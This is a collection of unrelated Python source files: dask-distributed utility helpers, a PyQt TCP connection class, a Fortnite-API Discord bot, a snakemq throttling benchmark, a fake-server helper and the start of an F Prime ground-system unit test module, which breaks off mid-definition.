word.isalpha() and not ( len(word) == 8 and hex_pattern.match(word) is not None ): result += "-" + word else: break if len(result) == 32 and re.match(r"[a-f0-9]{32}", result): return "data" else: if result[0] == "<": result = result.strip("<>").split()[0].split(".")[-1] return result except Exception: return "Other" def key_split_group(x): """A more fine-grained version of key_split >>> key_split_group(('x-2', 1)) 'x-2' >>> key_split_group("('x-2', 1)") 'x-2' >>> key_split_group('ae05086432ca935f6eba409a8ecd4896') 'data' >>> key_split_group('<module.submodule.myclass object at 0xdaf372') 'myclass' >>> key_split_group('x') >>> key_split_group('x-1') """ typ = type(x) if typ is tuple: return x[0] elif typ is str: if x[0] == "(": return x.split(",", 1)[0].strip("()\"'") elif len(x) == 32 and re.match(r"[a-f0-9]{32}", x): return "data" elif x[0] == "<": return x.strip("<>").split()[0].split(".")[-1] else: return key_split(x) elif typ is bytes: return key_split_group(x.decode()) else: return key_split(x) @contextmanager def log_errors(pdb=False): from .comm import CommClosedError try: yield except (CommClosedError, gen.Return): raise except Exception as e: try: logger.exception(e) except TypeError: # logger becomes None during process cleanup pass if pdb: import pdb pdb.set_trace() raise def silence_logging(level, root="distributed"): """ Change all StreamHandlers for the given logger to the given level """ if isinstance(level, str): level = getattr(logging, level.upper()) old = None logger = logging.getLogger(root) for handler in logger.handlers: if isinstance(handler, logging.StreamHandler): old = handler.level handler.setLevel(level) return old @toolz.memoize def ensure_ip(hostname): """Ensure that address is an IP address Examples -------- >>> ensure_ip('localhost') '127.0.0.1' >>> ensure_ip('123.123.123.123') # pass through IP addresses '123.123.123.123' """ # Prefer IPv4 over IPv6, for compatibility families = [socket.AF_INET, socket.AF_INET6] for fam in families: try: results = socket.getaddrinfo( hostname, 1234, fam, socket.SOCK_STREAM # dummy port number ) except socket.gaierror as e: exc = e else: return results[0][4][0] raise exc tblib.pickling_support.install() def get_traceback(): exc_type, exc_value, exc_traceback = sys.exc_info() bad = [ os.path.join("distributed", "worker"), os.path.join("distributed", "scheduler"), os.path.join("tornado", "gen.py"), os.path.join("concurrent", "futures"), ] while exc_traceback and any( b in exc_traceback.tb_frame.f_code.co_filename for b in bad ): exc_traceback = exc_traceback.tb_next return exc_traceback def truncate_exception(e, n=10000): """ Truncate exception to be about a certain length """ if len(str(e)) > n: try: return type(e)("Long error message", str(e)[:n]) except Exception: return Exception("Long error message", type(e), str(e)[:n]) else: return e def validate_key(k): """Validate a key as received on a stream.""" typ = type(k) if typ is not str and typ is not bytes: raise TypeError("Unexpected key type %s (value: %r)" % (typ, k)) def _maybe_complex(task): """ Possibly contains a nested task """ return ( istask(task) or type(task) is list and any(map(_maybe_complex, task)) or type(task) is dict and any(map(_maybe_complex, task.values())) ) def seek_delimiter(file, delimiter, blocksize): """Seek current file to next byte after a delimiter bytestring This seeks the file to the next byte following the delimiter. It does not return anything. Use ``file.tell()`` to see location afterwards. Parameters ---------- file: a file delimiter: bytes a delimiter like ``b'\n'`` or message sentinel blocksize: int Number of bytes to read from the file at once. """ if file.tell() == 0: return last = b"" while True: current = file.read(blocksize) if not current: return full = last + current try: i = full.index(delimiter) file.seek(file.tell() - (len(full) - i) + len(delimiter)) return except ValueError: pass last = full[-len(delimiter) :] def read_block(f, offset, length, delimiter=None): """Read a block of bytes from a file Parameters ---------- f: file File-like object supporting seek, read, tell, etc.. offset: int Byte offset to start read length: int Number of bytes to read delimiter: bytes (optional) Ensure reading starts and stops at delimiter bytestring If using the ``delimiter=`` keyword argument we ensure that the read starts and stops at delimiter boundaries that follow the locations ``offset`` and ``offset + length``. If ``offset`` is zero then we start at zero. The bytestring returned WILL include the terminating delimiter string. Examples -------- >>> from io import BytesIO # doctest: +SKIP >>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300') # doctest: +SKIP >>> read_block(f, 0, 13) # doctest: +SKIP b'Alice, 100\\nBo' >>> read_block(f, 0, 13, delimiter=b'\\n') # doctest: +SKIP b'Alice, 100\\nBob, 200\\n' >>> read_block(f, 10, 10, delimiter=b'\\n') # doctest: +SKIP b'Bob, 200\\nCharlie, 300' """ if delimiter: f.seek(offset) seek_delimiter(f, delimiter, 2 ** 16) start = f.tell() length -= start - offset f.seek(start + length) seek_delimiter(f, delimiter, 2 ** 16) end = f.tell() offset = start length = end - start f.seek(offset) bytes = f.read(length) return bytes @contextmanager def tmpfile(extension=""): extension = "." + extension.lstrip(".") handle, filename = tempfile.mkstemp(extension) os.close(handle) os.remove(filename) yield filename if os.path.exists(filename): try: if os.path.isdir(filename): shutil.rmtree(filename) else: os.remove(filename) except OSError: # sometimes we can't remove a generated temp file pass def ensure_bytes(s): """Attempt to turn `s` into bytes. Parameters ---------- s : Any The object to be converted. Will correctly handled * str * bytes * objects implementing the buffer protocol (memoryview, ndarray, etc.) Returns ------- b : bytes Raises ------ TypeError When `s` cannot be converted Examples -------- >>> ensure_bytes('123') b'123' >>> ensure_bytes(b'123') b'123' """ if isinstance(s, bytes): return s elif hasattr(s, "encode"): return s.encode() else: try: return bytes(s) except Exception as e: raise TypeError( "Object %s is neither a bytes object nor has an encode method" % s ) from e def divide_n_among_bins(n, bins): """ >>> divide_n_among_bins(12, [1, 1]) [6, 6] >>> divide_n_among_bins(12, [1, 2]) [4, 8] >>> divide_n_among_bins(12, [1, 2, 1]) [3, 6, 3] >>> divide_n_among_bins(11, [1, 2, 1]) [2, 6, 3] >>> divide_n_among_bins(11, [.1, .2, .1]) [2, 6, 3] """ total = sum(bins) acc = 0.0 out = [] for b in bins: now = n / total * b + acc now, acc = divmod(now, 1) out.append(int(now)) return out def mean(seq): seq = list(seq) return sum(seq) / len(seq) if hasattr(sys, "is_finalizing"): def shutting_down(is_finalizing=sys.is_finalizing): return is_finalizing() else: _shutting_down = [False] def _at_shutdown(l=_shutting_down): l[0] = True def shutting_down(l=_shutting_down): return l[0] atexit.register(_at_shutdown) shutting_down.__doc__ = """ Whether the interpreter is currently shutting down. For use in finalizers, __del__ methods, and similar; it is advised to early bind this function rather than look it up when calling it, since at shutdown module globals may be cleared. """ def open_port(host=""): """Return a probably-open port There is a chance that this port will be taken by the operating system soon after returning from this function. """ # http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((host, 0)) s.listen(1) port = s.getsockname()[1] s.close() return port def import_file(path): """ Loads modules for a file (.py, .zip, .egg) """ directory, filename = os.path.split(path) name, ext = os.path.splitext(filename) names_to_import = [] tmp_python_path = None if ext in (".py",): # , '.pyc'): if directory not in sys.path: tmp_python_path = directory names_to_import.append(name) if ext == ".py": # Ensure that no pyc file will be reused cache_file = cache_from_source(path) with suppress(OSError): os.remove(cache_file) if ext in (".egg", ".zip", ".pyz"): if path not in sys.path: sys.path.insert(0, path) names = (mod_info.name for mod_info in pkgutil.iter_modules([path])) names_to_import.extend(names) loaded = [] if not names_to_import: logger.warning("Found nothing to import from %s", filename) else: importlib.invalidate_caches() if tmp_python_path is not None: sys.path.insert(0, tmp_python_path) try: for name in names_to_import: logger.info("Reload module %s from %s file", name, ext) loaded.append(importlib.reload(importlib.import_module(name))) finally: if tmp_python_path is not None: sys.path.remove(tmp_python_path) return loaded class itemgetter: """A picklable itemgetter. Examples -------- >>> data = [0, 1, 2] >>> get_1 = itemgetter(1) >>> get_1(data) 1 """ __slots__ = ("index",) def __init__(self, index): self.index = index def __call__(self, x): return x[self.index] def __reduce__(self): return (itemgetter, (self.index,)) def asciitable(columns, rows): """Formats an ascii table for given columns and rows. Parameters ---------- columns : list The column names rows : list of tuples The rows in the table. Each tuple must be the same length as ``columns``. """ rows = [tuple(str(i) for i in r) for r in rows] columns = tuple(str(i) for i in columns) widths = tuple(max(max(map(len, x)), len(c)) for x, c in zip(zip(*rows), columns)) row_template = ("|" + (" %%-%ds |" * len(columns))) % widths header = row_template % tuple(columns) bar = "+%s+" % "+".join("-" * (w + 2) for w in widths) data = "\n".join(row_template % r for r in rows) return "\n".join([bar, header, bar, data, bar]) def nbytes(frame, _bytes_like=(bytes, bytearray)): """ Number of bytes of a frame or memoryview """ if isinstance(frame, _bytes_like): return len(frame) else: try: return frame.nbytes except AttributeError: return len(frame) def is_writeable(frame): """ Check whether frame is writeable Will return ``True`` if writeable, ``False`` if readonly, and ``None`` if undetermined. """ try: return not memoryview(frame).readonly except TypeError: return None @contextmanager def time_warn(duration, text): start = time() yield end = time() if end - start > duration: print("TIME WARNING", text, end - start) def json_load_robust(fn, load=json.load): """ Reads a JSON file from disk that may be being written as we read """ while not os.path.exists(fn): sleep(0.01) for i in range(10): try: with open(fn) as f: cfg = load(f) if cfg: return cfg except (ValueError, KeyError): # race with writing process pass sleep(0.1) class DequeHandler(logging.Handler): """ A logging.Handler that records records into a deque """ _instances = weakref.WeakSet() def __init__(self, *args, n=10000, **kwargs): self.deque = deque(maxlen=n) super().__init__(*args, **kwargs) self._instances.add(self) def emit(self, record): self.deque.append(record) def clear(self): """ Clear internal storage. """ self.deque.clear() @classmethod def clear_all_instances(cls): """ Clear the internal storage of all live DequeHandlers. """ for inst in list(cls._instances): inst.clear() def reset_logger_locks(): """Python 2's logger's locks don't survive a fork event https://github.com/dask/distributed/issues/1491 """ for name in logging.Logger.manager.loggerDict.keys(): for handler in logging.getLogger(name).handlers: handler.createLock() is_server_extension = False if "notebook" in sys.modules: import traitlets from notebook.notebookapp import NotebookApp is_server_extension = traitlets.config.Application.initialized() and isinstance( traitlets.config.Application.instance(), NotebookApp ) if not is_server_extension: is_kernel_and_no_running_loop = False if is_kernel(): try: get_running_loop() except RuntimeError: is_kernel_and_no_running_loop = True if not is_kernel_and_no_running_loop: # TODO: Use tornado's AnyThreadEventLoopPolicy, instead of class below, # once tornado > 6.0.3 is available. if WINDOWS and hasattr(asyncio, "WindowsSelectorEventLoopPolicy"): # WindowsProactorEventLoopPolicy is not compatible with tornado 6 # fallback to the pre-3.8 default of Selector # https://github.com/tornadoweb/tornado/issues/2608 BaseEventLoopPolicy = asyncio.WindowsSelectorEventLoopPolicy else: BaseEventLoopPolicy = asyncio.DefaultEventLoopPolicy class AnyThreadEventLoopPolicy(BaseEventLoopPolicy): def get_event_loop(self): try: return super().get_event_loop() except (RuntimeError, AssertionError): loop = self.new_event_loop() self.set_event_loop(loop) return loop asyncio.set_event_loop_policy(AnyThreadEventLoopPolicy()) @functools.lru_cache(1000) def has_keyword(func, keyword): return keyword in inspect.signature(func).parameters @functools.lru_cache(1000) def command_has_keyword(cmd, k): if cmd is not None: if isinstance(cmd, str): try: from importlib import import_module cmd = import_module(cmd) except ImportError: raise ImportError("Module for command %s is not available" % cmd) if isinstance(getattr(cmd, "main"), click.core.Command): cmd = cmd.main if isinstance(cmd, click.core.Command): cmd_params = set( [ p.human_readable_name for p in cmd.params if isinstance(p, click.core.Option) ] ) return k in cmd_params return False # from bokeh.palettes import viridis # palette = viridis(18) palette = [ "#440154", "#471669", "#472A79", "#433C84", "#3C4D8A", "#355D8C", "#2E6C8E", "#287A8E", "#23898D", "#1E978A", "#20A585", "#2EB27C", "#45BF6F", "#64CB5D", "#88D547", "#AFDC2E", "#D7E219", "#FDE724", ] @toolz.memoize def color_of(x, palette=palette): h = md5(str(x).encode()) n = int(h.hexdigest()[:8], 16) return palette[n % len(palette)] @functools.lru_cache(None) def iscoroutinefunction(f): return inspect.iscoroutinefunction(f) or gen.is_coroutine_function(f) @contextmanager def warn_on_duration(duration, msg): start = time() yield stop = time() if stop - start > parse_timedelta(duration): warnings.warn(msg, stacklevel=2) def typename(typ): """Return name of type Examples -------- >>> from distributed import Scheduler >>> typename(Scheduler) 'distributed.scheduler.Scheduler' """ try: return typ.__module__ + "." + typ.__name__ except AttributeError: return str(typ) def format_dashboard_link(host, port): template = dask.config.get("distributed.dashboard.link") if dask.config.get("distributed.scheduler.dashboard.tls.cert"): scheme = "https" else: scheme = "http" return template.format( **toolz.merge(os.environ, dict(scheme=scheme, host=host, port=port)) ) def parse_ports(port): """Parse input port information into list of ports Parameters ---------- port : int, str, None Input port or ports. Can be an integer like 8787, a string for a single port like "8787", a string for a sequential range of ports like "8000:8200", or None. Returns ------- ports : list List of ports Examples -------- A single port can be specified using an integer: >>> parse_ports(8787) >>> [8787] or a string: >>> parse_ports("8787") >>> [8787] A sequential range of ports can be specified by a string which indicates the first and last ports which should be included in the sequence of ports: >>> parse_ports("8787:8790") >>> [8787, 8788, 8789, 8790] An input of ``None`` is also valid and can be used to indicate that no port has been specified: >>> parse_ports(None) >>> [None] """ if isinstance(port, str) and ":" not in port: port = int(port) if isinstance(port, (int, type(None))): ports = [port] else: port_start, port_stop = map(int, port.split(":")) if port_stop <= port_start: raise ValueError( "When specifying a range of ports like port_start:port_stop, " "port_stop must be greater than port_start, but got " f"port_start={port_start} and port_stop={port_stop}" ) ports = list(range(port_start, port_stop + 1)) return ports is_coroutine_function = iscoroutinefunction class Log(str): """ A container for logs """ def _repr_html_(self): return "<pre><code>\n{log}\n</code></pre>".format( log=html.escape(self.rstrip()) ) class Logs(dict): """ A container for multiple logs """ def _repr_html_(self): summaries = [ "<details>\n" "<summary style='display:list-item'>{title}</summary>\n" "{log}\n" "</details>".format(title=title, log=log._repr_html_()) for title, log in sorted(self.items()) ] return "\n".join(summaries) def cli_keywords(d: dict, cls=None, cmd=None): """Convert a kwargs dictionary into a list of CLI keywords Parameters ---------- d : dict The keywords to convert cls : callable The callable that consumes these terms to check them for validity cmd : string or object A string with the name of a module, or the module containing a click-generated command with a "main" function, or the function itself. It may be used to parse a module's custom arguments (i.e., arguments that are not part of Worker class), such as nprocs from dask-worker CLI or enable_nvlink from dask-cuda-worker CLI. Examples -------- >>> cli_keywords({"x": 123, "save_file": "foo.txt"}) ['--x', '123', '--save-file', 'foo.txt'] >>> from dask.distributed import Worker >>> cli_keywords({"x": 123}, Worker) Traceback (most recent call last): ... ValueError: Class distributed.worker.Worker does not support keyword x """ if cls or cmd: for k in d: if not has_keyword(cls, k) and not command_has_keyword(cmd, k): if cls and cmd: raise ValueError( "Neither class %s or module %s support keyword %s" % (typename(cls), typename(cmd), k) ) elif cls: raise ValueError( "Class %s does not support keyword %s" % (typename(cls), k) ) else: raise ValueError( "Module %s does not support keyword %s" % (typename(cmd), k) ) def convert_value(v): out = str(v) if " " in out and "'" not in out and '"' not in out: out = '"' + out + '"' return out return sum( [["--" + k.replace("_", "-"), convert_value(v)] for k, v in d.items()], [] ) def is_valid_xml(text): return xml.etree.ElementTree.fromstring(text) is not None _offload_executor = ThreadPoolExecutor(max_workers=1, thread_name_prefix="Dask-Offload") weakref.finalize(_offload_executor, _offload_executor.shutdown) def import_term(name: str): """Return the fully qualified term Examples -------- >>> import_term("math.sin") <function math.sin(x, /)> """ try: module_name, attr_name = name.rsplit(".", 1) except ValueError: return importlib.import_module(name) module = importlib.import_module(module_name) return getattr(module, attr_name) async def offload(fn, *args, **kwargs): loop = asyncio.get_event_loop() return await loop.run_in_executor(_offload_executor, lambda: fn(*args, **kwargs)) def serialize_for_cli(data): """Serialize data into a string that can be passthrough cli Parameters ---------- data : json-serializable object The data to serialize Returns ------- serialized_data : str The serialized data as a string """ return base64.urlsafe_b64encode(json.dumps(data).encode()).decode() def deserialize_for_cli(data): """De-serialize data into the original object Parameters ---------- data : str String serialied by serialize_for_cli() Returns ------- deserialized_data : obj The de-serialized data """ return json.loads(base64.urlsafe_b64decode(data.encode()).decode()) class EmptyContext: def __enter__(self): pass def __exit__(self, *args): pass async def __aenter__(self): pass async def __aexit__(self, *args): pass empty_context = EmptyContext() class LRU(UserDict): """Limited size mapping, evicting the least recently looked-up key when full""" def __init__(self, maxsize): super().__init__() self.data = OrderedDict() self.maxsize = maxsize def __getitem__(self, key): value = super().__getitem__(key) self.data.move_to_end(key) return value def __setitem__(self, key, value): if len(self) >= self.maxsize: self.data.popitem(last=False) super().__setitem__(key, value) def clean_dashboard_address(addr, default_listen_ip=""): """ Examples -------- >>> clean_dashboard_address(8787) {'address': '', 'port': 8787} >>> clean_dashboard_address(":8787") {'address': '', 'port': 8787} >>> clean_dashboard_address("8787") {'address': '', 'port': 8787} >>> clean_dashboard_address("8787") {'address': '', 'port': 8787} >>> clean_dashboard_address("foo:8787") {'address': 'foo', 'port': 8787} """ if default_listen_ip == "0.0.0.0": default_listen_ip = "" # for IPV6 try: addr = int(addr) except (TypeError, ValueError): pass if isinstance(addr, str): addr = addr.split(":") if isinstance(addr, (tuple, list)): if len(addr) == 2: host, port = (addr[0], int(addr[1])) elif len(addr) == 1: [host], port = addr, 0 else: raise ValueError(addr) elif isinstance(addr, int): host = default_listen_ip port = addr return {"address": host, "port": port}
tcp_media.py
# encoding:utf-8 from .media import Media,MediaText import socket from queue import Queue from threading import Thread from tools.converter import str2bytearray from PyQt5.QtCore import QTimer, pyqtSignal def receive_from_socket(tcp_media): while tcp_media.receiving: data = tcp_media.socket.recv(1) tcp_media.rcv_queue.put(data) class TCPMedia(Media): def __init__(self): super(TCPMedia, self).__init__(self._get_all_options()) self.socket = None self.read_timer = QTimer() self.read_timer.timeout.connect(self._receive) self.read_timer.start(10) self.rcv_queue = Queue() self.receiving = True self.rcv_thread = None def is_open(self): return self.socket def open(self): if self.socket is None: selected_options = self.get_selected_options() selected_options["timeout"] = 0 try: self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self.socket.connect((selected_options["IP"], int(selected_options["PORT"]))) self.receiving = True self.rcv_thread = Thread(target=receive_from_socket, args=(self,)) self.rcv_thread.start() except socket.error as e: print("error happen",e) self.refresh_media_options() return False return True def _get_all_options(self): options = list() options.append(MediaText("IP", "127.0.0.1")) options.append(MediaText("PORT", "8266", u"端口号")) return options def refresh_media_options(self): self.media_options = self._get_all_options() self.load_saved_options() def close(self): if self.socket is not None: self.socket.close() if self.rcv_thread is not None and self.rcv_thread.isAlive(): self.receiving = False self.rcv_thread.join() def send(self, data): self.socket.send(data) def _receive(self): data = bytes([]) while not self.rcv_queue.empty(): data += self.rcv_queue.get() if len(data) > 0: self.data_ready.emit(data) def set_media_options(self, options): self.read_timer.stop() super(TCPMedia, self).set_media_options(options) if self.socket is not None: self.socket.close() self.socket = None is_open = self.open() self.read_timer.start(10) return is_open if __name__ == "__main__": import json serial = TCPMedia() print(json.dumps(serial.get_media_options(), ensure_ascii=False, encoding='UTF-8'))
main.py
# Fortnite-Api-Discord github.com/BayGamerYT/Fortnite-Api-Discord | Coding UTF-8 print('Fortnite-Api-Discord | Made by BayGamerYT') import json, os def data(): with open('config.json', 'r', encoding='utf-8') as f: return json.load(f) def text(): try: with open(f'lang/{data()["bot_lang"]}.json', 'r', encoding='utf-8') as f: return json.load(f) except: print('Invalid lang in settings') exit() try: from discord.ext import commands from threading import Thread from flask import Flask import requests import aiohttp import discord except: print(text()['module_not_found_error']) exit() response_lang = 'en' if data()['Response lang'] == '' else data()['Response lang'] request_lang = 'en' if data()['Search lang'] == '' else data()['Search lang'] T = os.getenv('Token') if data()['Token'] == 'ENV' else data()['Token'] bot = commands.Bot(command_prefix=data()['Prefix']) app=Flask("") @app.route("/") def index(): return "Running" @bot.event async def on_ready(): print('\n' + text()['bot_ready']) print(text()['name'] + f': {bot.user.name}#{bot.user.discriminator}') print(f'ID: {bot.user.id}\n') Thread(target=app.run,args=("0.0.0.0",8080)).start() @bot.command(pass_context=True) async def brnews(ctx, l = None): res_lang = response_lang if l == None: res_lang = response_lang response = requests.get(f'https://fortnite-api.com/v2/news/br?language={res_lang}') geted = response.json() if response.status_code == 200: image = geted['data']['image'] embed = discord.Embed(title=text()['br_news']) embed.set_image(url=image) await ctx.send(embed=embed) elif response.status_code == 400: error = geted['error'] embed = discord.Embed(title='Error', description=f'`{error}`') await ctx.send(embed=embed) elif response.status_code == 404: error =geted['error'] embed = discord.Embed(title='Error', description=f'``{error}``') await ctx.send(embed=embed) def color(value): if value == 'legendary': return 0xf0b132 elif value == 'epic': return 0x9d4dbb elif value == 'rare': return 0x0086FF elif value == 'uncommon': return 0x65b851 elif value == 'common': return 0x575757 elif value == 'icon': return 0x00FFFF elif value == 'marvel': return 0xED1D24 elif value == 'shadow': return 0x292929 elif value == 'dc': return 0x2b3147 elif value == 'slurp': return 0x09E0F0 elif value == 'dark': return 0xFF00FF elif value == 'frozen': return 0x93F7F6 elif value == 'lava': return 0xF55F35 elif value == 'starwars': return 0xCCCC00 else: return 0xffffff @bot.command(pass_context=True) async def item(ctx, *args): joinedArgs = ('+'.join(args)) if args != None: response = requests.get(f'https://fortnite-api.com/v2/cosmetics/br/search/all?name={joinedArgs}&matchMethod=starts&language={response_lang}&searchLanguage={request_lang}') geted = response.json() if response.status_code == 200: embed_count=0 item_left_count=0 for item in geted['data']: if embed_count != data()['Max_Search_Results']: embed_count+=1 item_id = item['id'] item_name = item['name'] item_description = item['description'] item_icon = item['images']['icon'] item_introduction = item['introduction']['text'] item_rarity = item['rarity']['displayValue'] if item['set'] == None: item_set = text()['none'] else: item_set = item['set']['text'] name = text()['name'] desc = text()['description'] intro = text()['introduction'] of_set = text()['set'] txt_id = text()['id'] rarity = text()['rarity'] embed = discord.Embed(title=f'{item_name}', color=color(item['rarity']['value'])) embed.add_field(name=desc, value=f'`{item_description}`') embed.add_field(name=txt_id, value=f'`{item_id}`') embed.add_field(name=intro, value=f'`{item_introduction}`') embed.add_field(name=of_set, value=f'`{item_set}`') embed.add_field(name=rarity, value=f'`{item_rarity}`') embed.set_thumbnail(url=item_icon) await ctx.send(embed=embed) else: item_left_count+=1 if item_left_count: max_srch = data()['Max_Search_Results'] mx_txt = text()['max_results_exceed_text'] await ctx.send(mx_txt.format(item_left_count, max_srch)) elif response.status_code == 400: error = geted['error'] embed = discord.Embed(title='Error', description=f'``{error}``') await ctx.send(embed=embed) elif response.status_code == 404: error = geted['error'] embed = discord.Embed(title='Error', description=f'``{error}``') await ctx.send(embed=embed) @bot.command(pass_context=True) async def cc(ctx, code = None): if code != None: response = requests.get(f'https://fortnite-api.com/v2/creatorcode?name={code}') geted = response.json() if response.status_code == 200: codeAcc =geted['data']['account']['name'] codeAccID =geted['data']['account']['id'] codestatus =geted['data']['status'] codeverified =geted['data']['verified'] code = text()['code'] account = text()['account'] text_id = text()['id'] active = text()['active'] inactive = text()['inactive'] verified_bool = text()['verified_bool'] account_id = text()['account_id'] yes = text()['text_yes'] no = text()['text_no'] status = text()['status'] embed = discord.Embed(title='Creator Code info', description=None) embed.add_field(name=code, value=f'``{code}``', inline=True) embed.add_field(name=account, value=f'``{codeAcc}``', inline=True) embed.add_field(name=account_id, value=f'``{codeAccID}``') if codestatus == 'ACTIVE': embed.add_field(name=status, value=f'``{active}``', inline=True) else: embed.add_field(name=status, value=f'``{inactive}``', inline=True) if codeverified == True: embed.add_field(name=verified_bool, value=f'``{yes}``') else: embed.add_field(name=verified_bool, value=f'``{no}``') await ctx.send(embed=embed) elif response.status_code == 400: error = geted['error'] embed = discord.Embed(title='Error', description=f'``{error}``') await ctx.send(embed=embed) elif response.status_code == 404: error = geted['error'] embed = discord.Embed(title='Error', description=f'``{error}``') await ctx.send(embed=embed) @bot.event async def on_command_error(ctx, error): if isinstance(error, commands.CommandNotFound): await ctx.send(text()['command_not_found_error']) else: raise error try: bot.run(T) except Exception as e: print(e) exit()
packeter_single_large_throttled.py
#!/usr/bin/env python """ Send a single large packet over a single connection. @author: David Siroky (siroky@dasir.cz) @license: MIT License (see LICENSE.txt or U{http://www.opensource.org/licenses/mit-license.php}) """ import time import logging import sys from multiprocessing import Process sys.path.insert(0, "../..") import snakemq import snakemq.link import snakemq.packeter import snakemq.throttle ########################################################################### DATA_SIZE = 1 * 1024 * 1024 PORT = 4000 ########################################################################### def srv(): s = snakemq.link.Link() container = {"start_time": None} def on_connect(conn_id): container["start_time"] = time.time() def on_packet_recv(conn_id, packet): assert len(packet) == DATA_SIZE diff = time.time() - container["start_time"] print "flow: %.02f MBps" % (DATA_SIZE / diff / 1024**2) def on_disconnect(conn_id): s.stop() s.add_listener(("", PORT)) tr = snakemq.packeter.Packeter(s) tr.on_connect = on_connect tr.on_packet_recv = on_packet_recv tr.on_disconnect = on_disconnect s.loop() s.cleanup() ########################################################################### def cli(): s = snakemq.link.Link() def on_connect(conn_id): tr.send_packet(conn_id, "x" * DATA_SIZE) def on_packet_sent(conn_id, packet_id): s.stop() s.add_connector(("localhost", PORT)) throttle = snakemq.throttle.Throttle(s, 100000) tr = snakemq.packeter.Packeter(throttle) tr.on_connect = on_connect tr.on_packet_sent = on_packet_sent s.loop() s.cleanup() ########################################################################### # avoid logging overhead logger = logging.getLogger("snakemq") logger.setLevel(logging.ERROR) thr_srv = Process(target=srv) thr_srv.start() thr_cli = Process(target=cli) thr_cli.start() thr_srv.join() thr_cli.join()
fake_server_manager.py
__author__ = 'dev' import threading class FakeServerManager: def __init__(self, server_class, request_handler_class, server_port, **kwargs): self.server = server_class(('', server_port), request_handler_class, kwargs) def start_server(self): threading.Thread(target=self.server.serve_forever).start() def stop_server(self): self.server.shutdown()
api_unit_test.py
import math import os import sys import threading import time import unittest filename = os.path.dirname(__file__) gdsName = os.path.join(filename, "../../../../src") fprimeName = os.path.join(filename, "../../../../../Fw/Python/src") sys.path.insert(0, gdsName) sys.path.insert(0, fprimeName) from fprime_gds.common.testing_fw import predicates from fprime_gds.common.history.test import TestHistory from fprime_gds.common.testing_fw.api import IntegrationTestAPI from fprime_gds.common.pipeline.standard import StandardPipeline from fprime_gds.common.utils.config_manager import ConfigManager # these imports are needed to generate data objects. from fprime.common.models.serialize.i32_type import I32Type from fprime.common.models.serialize.u32_type import U32Type from fprime.common.models.serialize.string_type import StringType from fprime.common.models.serialize.time_type import TimeType from fprime_gds.common.data_types.ch_data import ChData from fprime_gds.common.data_types.cmd_data import CmdData from fprime_gds.common.data_types.event_data import EventData class UTPipeline(StandardPipeline): """ This pipeline shares many of the same calls available in pipeline.standard. It is used by this testcase to feed simulated data to the test api. """ def __init__(self): self.command_count = 0 self.t0 = TimeType() StandardPipeline.__init__(self) def connect(self, address, port): pass def disconnect(self): pass def send_command(self, command, args): command_template = self.command_id_dict[command] cmd_data = CmdData(tuple(args), command_template) self.command_hist.data_callback(cmd_data) for hist in self.command_subscribers: hist.data_callback(cmd_data) ev_temp = self.event_name_dict["CommandReceived"] event = EventData((U32Type(cmd_data.get_id()),), self.t0 + time.time(), ev_temp) self.enqueue_event(event) ev_temp = self.event_name_dict["HistorySizeUpdate"] evr_size = U32Type(len(self.event_hist.retrieve())) cmd_size = U32Type(len(self.command_hist.retrieve())) ch_size = U32Type(len(self.channel_hist.retrieve())) event = EventData((evr_size, cmd_size, ch_size), self.t0 + time.time(), ev_temp) self.enqueue_event(event) self.command_count += 1 ch_temp = self.channel_name_dict["CommandCounter"] update = ChData(U32Type(self.command_count), self.t0 + time.time(), ch_temp) self.enqueue_telemetry(update) def enqueue_event(self, event): """ Used by the unit test to feed simulated data objects into the pipeline """ self.event_decoder.send_to_all(event) def enqueue_telemetry(self, channel): """ Used by the unit test to feed simulated data objects into the pipeline """ self.channel_decoder.send_to_all(channel) class APITestCases(unittest.TestCase): @classmethod def setUpClass(cls): cls.pipeline = UTPipeline() config = ConfigManager() filename = os.path.dirname(__file__) path = os.path.join(filename, "./UnitTestDictionary.xml") cls.pipeline.setup(config, path) log_path = os.path.join(filename, "./logs") cls.api = IntegrationTestAPI(cls.pipeline, log_path) cls.case_list = [] # TODO find a better way to do this. cls.threads = [] def setUp(self): for t in self.threads: if t.isAlive(): t.join() self.threads.clear() count = len(self.case_list) self.api.start_test_case(self._testMethodName, count) self.case_list.append(1) self.tHistory = TestHistory() self.t0 = TimeType() @classmethod def tearDownClass(cls): cls.pipeline.disconnect() cls.api.teardown() ###################################################################################### # Test Case Helper Methods ###################################################################################### def fill_history(self, callback, items, timestep=0): for item in items: if timestep: time.sleep(timestep) if isinstance(item, ChData) or isinstance(item, EventData): if item.time == 0: item.time = self.t0 + time.time() callback(item) def fill_history_async(self, callback, items, timestep=1): t = threading.Thread(target=self.fill_history, args=(callback, items, timestep)) self.threads.append(t) t.start() return t def assert_lists_equal(self, expected, actual): assert len(expected) == len( actual ), "the given list should have had the length {}, but instead had {}\nExpected {}\nActual{}".format( len(expected), len(actual), expected, actual ) for i in range(len(expected)): assert ( expected[i] == actual[i] ), "the {} element of the expected list should be {}, but was {}.".format( i, expected[i], actual[i] ) def get_counter_sequence(self, length): seq = [] for i in range(0, length): ch_temp = self.pipeline.get_channel_name_dictionary()["Counter"] seq.append(ChData(U32Type(i), TimeType(), ch_temp)) return seq def get_oscillator_sequence(self, length): seq = [] for i in range(0, length): ch_temp = self.pipeline.get_channel_name_dictionary()["Oscillator"] val = int(round(10*math.sin(math.radians(i)))) seq.append(ChData(I32Type(val), TimeType(), ch_temp)) return seq def get_severity_event(self, severity="DIAGNOSTIC"): name = "Severity" + severity temp = self.pipeline.get_event_name_dictionary()[name] event = EventData(tuple(), TimeType(), temp) return event def get_severity_sequence(self, length, severity="DIAGNOSTIC"): seq = [] for i in range(0, length): seq.append(self.get_severity_event(severity)) return seq class AssertionFailure(Exception): """ Used to differentiate an AssertionError in test cases that intentionally raise an assertion error. """ pass ###################################################################################### # Test Cases ###################################################################################### def test_dummy_pipeline(self): length = 15 event_list = self.get_severity_sequence(length) t1 = self.fill_history_async(self.pipeline.enqueue_event, event_list, 0.1) print("waiting for queue to fill") pred = predicates.greater_than_or_equal_to(length // 2) results = self.api.await_event_count(pred) assert pred(len(results)), "the correct amount of objects was received" t1.join() evr_hist = self.api.get_event_test_history() item_count = len(evr_hist) assert ( item_count == length ), "Were the correct number of items in the history? ({},{})".format( item_count, length ) def test_find_history_item(self): 